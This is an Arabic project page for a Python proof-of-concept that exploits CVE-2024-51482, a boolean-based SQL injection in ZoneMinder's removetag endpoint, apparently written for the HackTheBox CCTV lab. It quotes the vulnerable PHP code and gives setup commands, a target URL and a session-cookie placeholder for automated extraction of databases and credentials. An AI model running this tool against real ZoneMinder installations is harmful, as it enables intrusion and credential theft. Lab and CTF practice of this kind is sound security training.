
سكربتات بايثون لاستغلال CVE-2024-51482 (SQLi في ZoneMinder) — HTB CCTV
سكربتات بايثون لاستغلال CVE-2024-51482 (حقن SQL في ZoneMinder) — HTB CCTV sqli-hunter — CVE-2024-51482
يعمل هذا السكربت على أتمتة استخراج قواعد البيانات والجداول والأعمدة وبيانات الاعتماد باستغلال CVE-2024-51482، وهي ثغرة حقن SQL قائمة على الاستجابات المنطقية (Boolean-based SQL Injection) في الوسيط tid لنقطة نهاية removetag في ZoneMinder ≤ 1.37.64. الكود الضعيف في web/ajax/event.php يُدرج $_REQUEST['tid'] مباشرةً في استعلام SQL دون تعقيم
case 'removetag':
$tagId = $_REQUEST['tid'];
$sql = "SELECT * FROM Events_Tags WHERE TagId = $tagId"; // ← vulnerable
$rowCount = dbNumRows($sql);
-Python 3.x
-pwntools
git clone https://github.com/lnn0v4/sqli-hunter-CVE-2024-51482-PoC.git
cd sqli-hunter-CVE-2024-51482-PoC
python3 -m venv venv
source venv/bin/activate
pip install pwntools
URL = "http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid="
COOKIE = {"ZMSESSID": "TU_COOKIE_AQUI"}
python3 CVE-2024-51482.py
✅ الكشف التلقائي عن زمن الاستجابة الأساسي
✅ بحث ثنائي باستخدام ASCII (أسرع 7x من القوة الغاشمة)
✅ استخراج متوازٍ باستخدام الخيوط (ThreadPoolExecutor)
✅ قائمة تفاعلية: DB → الجداول → الأعمدة → البيانات
✅ ذاكرة كاش للأعمدة لتجنب إعادة الاستخراج
✅ التنقل بين الجداول دون إعادة تشغيل السكربت
⚠️ هذا السكربت مخصص للأغراض التعليمية فقط وللاستخدام في بيئات مصرّح بها مثل HackTheBox. لا تستخدم هذا الكود على أنظمة دون إذن صريح.
رخصة MIT